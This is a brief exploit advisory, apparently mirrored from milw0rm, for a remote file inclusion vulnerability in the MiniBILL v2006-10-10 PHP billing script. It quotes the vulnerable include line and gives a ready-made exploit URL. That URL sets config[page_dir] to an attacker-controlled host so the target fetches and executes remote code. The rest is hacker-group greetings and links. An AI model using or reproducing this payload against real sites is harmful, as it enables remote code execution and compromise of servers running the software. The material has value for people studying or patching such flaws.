AOH :: HP Unsorted M :: B06-5435.HTM

MiniBILL v2006-10-10 (config Remote File Include Vulnerability



MiniBILL v2006-10-10 (config Remote File Include Vulnerability
MiniBILL v2006-10-10 (config Remote File Include Vulnerability



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
MiniBILL v2006-10-10 (config[page_dir] Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Author: xoron

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
CODE:

line 71: include($config['page_dir']."menu.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit:

http://www.hedef.com/[script_path]/include/menu_builder.php?config[page_dir]=http://evil_script? 


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Thanx: str0ke, kacper, Preddy, chaos ,nukedx, SHiKaA, DJR

www.milw0rm.com 
www.team-rootshell.com 
www.cyber-warrior.org 
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
script url: http://www.ultrize.com/minibill/index.php?page=download 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
orj adv: http://www.milw0rm.com/exploits/2656 




The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.